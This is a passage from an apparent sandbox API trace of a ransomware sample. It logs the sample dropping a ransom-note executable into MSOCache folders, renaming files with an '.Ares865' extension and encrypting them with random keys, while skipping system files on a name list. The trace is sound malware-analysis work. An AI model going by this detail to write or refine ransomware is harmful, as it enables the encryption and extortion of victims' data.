dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.419] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4207) returned 1 [0078.419] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0078.419] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0078.419] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0078.420] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0078.420] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.420] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0078.420] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1370, lpName=0x0) returned 0xa4 [0078.422] MapViewOfFile (hFileMappingObject=0xa4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1370) returned 0x190000 [0078.423] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0078.423] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.423] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0078.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0078.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0078.424] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0078.424] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0078.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0078.424] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0078.424] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0078.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0078.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0078.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0078.424] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0078.424] CloseHandle (hObject=0xa4) returned 1 [0078.424] CloseHandle (hObject=0x118) returned 1 [0078.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0078.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0078.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0078.424] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0078.424] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0078.425] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d25e8 [0078.425] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C" [0078.425] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0270 | out: hHeap=0x2b0000) returned 1 [0078.425] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0078.425] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C") returned 62 [0078.425] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C" [0078.425] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.425] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0078.432] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.432] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x603fd360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x603fd360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.432] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.432] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.432] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0078.432] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x603fd360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x603fd360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.432] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.432] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0078.432] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0078.432] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0078.432] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x603fd360, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x603fd360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0078.432] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0078.432] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0078.432] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.432] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="aoldtz.exe") returned 1 [0078.432] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2=".") returned 1 [0078.432] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="..") returned 1 [0078.432] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="windows") returned -1 [0078.432] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="bootmgr") returned 1 [0078.432] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="temp") returned -1 [0078.432] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="pagefile.sys") returned 1 [0078.432] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="boot") returned 1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="ids.txt") returned 1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="ntuser.dat") returned 1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="perflogs") returned 1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="MSBuild") returned 1 [0078.433] lstrlenW (lpString="PublisherMUI.msi") returned 16 [0078.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*") returned 64 [0078.433] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PublisherMUI.xml", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="aoldtz.exe") returned 1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2=".") returned 1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="..") returned 1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="windows") returned -1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="bootmgr") returned 1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="temp") returned -1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="pagefile.sys") returned 1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="boot") returned 1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="ids.txt") returned 1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="ntuser.dat") returned 1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="perflogs") returned 1 [0078.433] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="MSBuild") returned 1 [0078.433] lstrlenW (lpString="PublisherMUI.xml") returned 16 [0078.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0078.433] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.Ares865") returned 87 [0078.433] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.ares865"), dwFlags=0x1) returned 1 [0078.435] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0078.435] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1450) returned 1 [0078.435] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0078.435] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0078.435] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0078.435] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0078.436] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.436] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0078.436] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8b0, lpName=0x0) returned 0xa4 [0078.438] MapViewOfFile (hFileMappingObject=0xa4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8b0) returned 0x190000 [0078.438] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0078.439] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.439] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0078.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0078.439] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0078.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0078.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0078.439] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0078.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0078.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0078.439] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0078.439] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0078.439] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0078.440] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0078.440] CloseHandle (hObject=0xa4) returned 1 [0078.440] CloseHandle (hObject=0x15c) returned 1 [0078.440] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0078.440] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0270 | out: hHeap=0x2b0000) returned 1 [0078.440] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0078.440] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc47e320, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x97f3f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PubLR.cab", cAlternateFileName="")) returned 1 [0078.440] lstrcmpiW (lpString1="PubLR.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.440] lstrcmpiW (lpString1="PubLR.cab", lpString2="aoldtz.exe") returned 1 [0078.440] lstrcmpiW (lpString1="PubLR.cab", lpString2=".") returned 1 [0078.440] lstrcmpiW (lpString1="PubLR.cab", lpString2="..") returned 1 [0078.440] lstrcmpiW (lpString1="PubLR.cab", lpString2="windows") returned -1 [0078.440] lstrcmpiW (lpString1="PubLR.cab", lpString2="bootmgr") returned 1 [0078.440] lstrcmpiW (lpString1="PubLR.cab", lpString2="temp") returned -1 [0078.440] lstrcmpiW (lpString1="PubLR.cab", lpString2="pagefile.sys") returned 1 [0078.440] lstrcmpiW (lpString1="PubLR.cab", lpString2="boot") returned 1 [0078.440] lstrcmpiW (lpString1="PubLR.cab", lpString2="ids.txt") returned 1 [0078.440] lstrcmpiW (lpString1="PubLR.cab", lpString2="ntuser.dat") returned 1 [0078.440] lstrcmpiW (lpString1="PubLR.cab", lpString2="perflogs") returned 1 [0078.440] lstrcmpiW (lpString1="PubLR.cab", lpString2="MSBuild") returned 1 [0078.440] lstrlenW (lpString="PubLR.cab") returned 9 [0078.440] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0078.440] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0078.441] lstrcmpiW (lpString1="Setup.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.441] lstrcmpiW (lpString1="Setup.xml", lpString2="aoldtz.exe") returned 1 [0078.441] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0078.441] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0078.441] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0078.441] lstrcmpiW (lpString1="Setup.xml", lpString2="bootmgr") returned 1 [0078.441] lstrcmpiW (lpString1="Setup.xml", lpString2="temp") returned -1 [0078.441] lstrcmpiW (lpString1="Setup.xml", lpString2="pagefile.sys") returned 1 [0078.441] lstrcmpiW (lpString1="Setup.xml", lpString2="boot") returned 1 [0078.441] lstrcmpiW (lpString1="Setup.xml", lpString2="ids.txt") returned 1 [0078.441] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0078.441] lstrcmpiW (lpString1="Setup.xml", lpString2="perflogs") returned 1 [0078.441] lstrcmpiW (lpString1="Setup.xml", lpString2="MSBuild") returned 1 [0078.441] lstrlenW (lpString="Setup.xml") returned 9 [0078.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0078.441] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0078.441] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0078.442] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0078.442] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1608) returned 1 [0078.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0078.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0078.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0078.442] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0078.443] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.443] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0078.443] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x950, lpName=0x0) returned 0xa4 [0078.444] MapViewOfFile (hFileMappingObject=0xa4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x950) returned 0x190000 [0078.445] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0078.446] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.446] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0078.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0078.446] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0078.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0078.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0078.446] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0078.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0078.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0078.446] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0078.446] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0078.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0078.447] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0078.447] CloseHandle (hObject=0xa4) returned 1 [0078.447] CloseHandle (hObject=0x15c) returned 1 [0078.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0078.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0270 | out: hHeap=0x2b0000) returned 1 [0078.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0078.447] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0078.447] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0078.447] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2588 [0078.447] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C" [0078.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0078.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0078.447] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C") returned 62 [0078.447] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C" [0078.447] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.447] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0078.452] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.452] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8729610, 